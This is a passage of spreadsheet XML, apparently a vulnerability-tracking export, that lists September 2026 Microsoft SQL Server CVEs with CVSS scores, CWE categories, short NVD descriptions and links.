          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62706</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B30" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C30" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66814</t>
        </is>
      </c>
      <c r="D30" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E30" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F30" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G30" s="5" t="inlineStr"/>
      <c r="H30" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I30" s="5" t="inlineStr"/>
      <c r="J30" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K30" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L30" s="5" t="inlineStr"/>
      <c r="M30" s="5" t="inlineStr"/>
      <c r="N30" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O30" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P30" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q30" s="5" t="inlineStr"/>
      <c r="R30" s="5" t="inlineStr">
        <is>
          <t>CWE-1220</t>
        </is>
      </c>
      <c r="S30" s="5" t="inlineStr">
        <is>
          <t>Insufficient granularity of access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T30" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66814</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B31" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C31" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66818</t>
        </is>
      </c>
      <c r="D31" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E31" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F31" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G31" s="5" t="inlineStr"/>
      <c r="H31" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I31" s="5" t="inlineStr"/>
      <c r="J31" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K31" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L31" s="5" t="inlineStr"/>
      <c r="M31" s="5" t="inlineStr"/>
      <c r="N31" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O31" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P31" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q31" s="5" t="inlineStr"/>
      <c r="R31" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S31" s="5" t="inlineStr">
        <is>
          <t>Improper privilege management in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T31" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66818</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B32" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C32" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66819</t>
        </is>
      </c>
      <c r="D32" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E32" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F32" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G32" s="5" t="inlineStr"/>
      <c r="H32" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I32" s="5" t="inlineStr"/>
      <c r="J32" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K32" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L32" s="5" t="inlineStr"/>
      <c r="M32" s="5" t="inlineStr"/>
      <c r="N32" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O32" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P32" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q32" s="5" t="inlineStr"/>
      <c r="R32" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S32" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T32" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66819</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B33" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C33" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66820</t>
        </is>
      </c>
      <c r="D33" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E33" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F33" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G33" s="5" t="inlineStr"/>
      <c r="H33" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I33" s="5" t="inlineStr"/>
      <c r="J33" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K33" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L33" s="5" t="inlineStr"/>
      <c r="M33" s="5" t="inlineStr"/>
      <c r="N33" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O33" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P33" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q33" s="5" t="inlineStr"/>
      <c r="R33" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S33" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T33" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66820</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B34" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C34" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67368</t>
        </is>
      </c>
      <c r="D34" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E34" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F34" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G34" s="5" t="inlineStr"/>
      <c r="H34" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I34" s="5" t="inlineStr"/>
      <c r="J34" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K34" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L34" s="5" t="inlineStr"/>
      <c r="M34" s="5" t="inlineStr"/>
      <c r="N34" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O34" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P34" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q34" s="5" t="inlineStr"/>
      <c r="R34" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="S34" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T34" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67368</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B35" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C35" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67370</t>
        </is>
      </c>
      <c r="D35" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E35" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F35" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G35" s="5" t="inlineStr"/>
      <c r="H35" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I35" s="5" t="inlineStr"/>
      <c r="J35" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K35" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L35" s="5" t="inlineStr"/>
      <c r="M35" s="5" t="inlineStr"/>
      <c r="N35" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O35" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P35" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q35" s="5" t="inlineStr"/>
      <c r="R35" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S35" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T35" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67370</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B36" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C36" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67373</t>
        </is>
      </c>
      <c r="D36" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E36" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F36" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G36" s="5" t="inlineStr"/>
      <c r="H36" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I36" s="5" t="inlineStr"/>
      <c r="J36" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K36" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L36" s="5" t="inlineStr"/>
      <c r="M36" s="5" t="inlineStr"/>
      <c r="N36" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O36" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P36" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q36" s="5" t="inlineStr"/>
      <c r="R36" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S36" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T36" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67373</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B37" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C37" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67380</t>
        </is>
      </c>
      <c r="D37" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E37" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F37" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G37" s="5" t="inlineStr"/>
      <c r="H37" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I37" s="5" t="inlineStr"/>
      <c r="J37" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K37" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L37" s="5" t="inlineStr"/>
      <c r="M37" s="5" t="inlineStr"/>
      <c r="N37" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O37" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P37" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q37" s="5" t="inlineStr"/>
      <c r="R37" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S37" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T37" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67380</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B38" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C38" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67381</t>
        </is>
      </c>
      <c r="D38" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E38" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F38" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G38" s="5" t="inlineStr"/>
      <c r="H38" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I38" s="5" t="inlineStr"/>
      <c r="J38" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K38" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L38" s="5" t="inlineStr"/>
      <c r="M38" s="5" t="inlineStr"/>
      <c r="N38" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O38" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P38" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q38" s="5" t="inlineStr"/>
      <c r="R38" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S38" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T38" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67381</t>
        </is>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B39" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C39" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67384</t>
        </is>
      </c>
      <c r="D39" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E39" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F39" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G39" s="5" t="inlineStr"/>
      <c r="H39" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I39" s="5" t="inlineStr"/>
      <c r="J39" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K39" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L39" s="5" t="inlineStr"/>
      <c r="M39" s="5" t="inlineStr"/>
      <c r="N39" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O39" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P39" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q39" s="5" t="inlineStr"/>
      <c r="R39" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="S39" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T39" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67384</t>
        </is>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B40" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C40" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67385</t>
        </is>
      </c>
      <c r="D40" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E40" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F40" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G40" s="5" t="inlineStr"/>
      <c r="H40" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I40" s="5" t="inlineStr"/>
      <c r="J40" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K40" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L40" s="5" t="inlineStr"/>
      <c r="M40" s="5" t="inlineStr"/>
      <c r="N40" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O40" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P40" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q40" s="5" t="inlineStr"/>
      <c r="R40" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S40" s="5" t="inlineStr">
        <is>
          <t>Use after free in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T40" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67385</t>
        </is>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B41" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C41" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67388</t>
        </is>
      </c>
      <c r="D41" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E41" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F41" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G41" s="5" t="inlineStr"/>
      <c r="H41" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I41" s="5" t="inlineStr"/>
      <c r="J41" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K41" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L41" s="5" t="inlineStr"/>
      <c r="M41" s="5" t="inlineStr"/>
      <c r="N41" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O41" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P41" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q41" s="5" t="inlineStr"/>
      <c r="R41" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S41" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T41" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67388</t>
        </is>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B42" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C42" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67638</t>
        </is>
      </c>
      <c r="D42" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E42" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F42" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G42" s="5" t="inlineStr"/>
      <c r="H42" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I42" s="5" t="inlineStr"/>
      <c r="J42" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K42" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L42" s="5" t="inlineStr"/>
      <c r="M42" s="5" t="inlineStr"/>
      <c r="N42" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O42" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P42" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q42" s="5" t="inlineStr"/>
      <c r="R42" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S42" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T42" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67638</t>
        </is>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B43" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C43" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67639</t>
        </is>
      </c>
      <c r="D43" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E43" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F43" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G43" s="5" t="inlineStr"/>
      <c r="H43" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I43" s="5" t="inlineStr"/>
      <c r="J43" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K43" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L43" s="5" t="inlineStr"/>
      <c r="M43" s="5" t="inlineStr"/>
      <c r="N43" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O43" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P43" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q43" s="5" t="inlineStr"/>
      <c r="R43" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S43" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T43" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67639</t>
        </is>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B44" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C44" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67642</t>
        </is>
      </c>
      <c r="D44" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E44" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F44" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G44" s="5" t="inlineStr"/>
      <c r="H44" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I44" s="5" t="inlineStr"/>
      <c r="J44" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K44" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L44" s="5" t="inlineStr"/>
      <c r="M44" s="5" t="inlineStr"/>
      <c r="N44" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O44" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P44" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q44" s="5" t="inlineStr"/>
      <c r="R44" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S44" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T44" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67642</t>
        </is>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B45" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C45" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68775</t>
        </is>
      </c>
      <c r="D45" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E45" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F45" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G45" s="5" t="inlineStr"/>
      <c r="H45" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I45" s="5" t="inlineStr"/>
      <c r="J45" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K45" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L45" s="5" t="inlineStr"/>
      <c r="M45" s="5" t="inlineStr"/>
      <c r="N45" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O45" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P45" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q45" s="5" t="inlineStr"/>
      <c r="R45" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S45" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
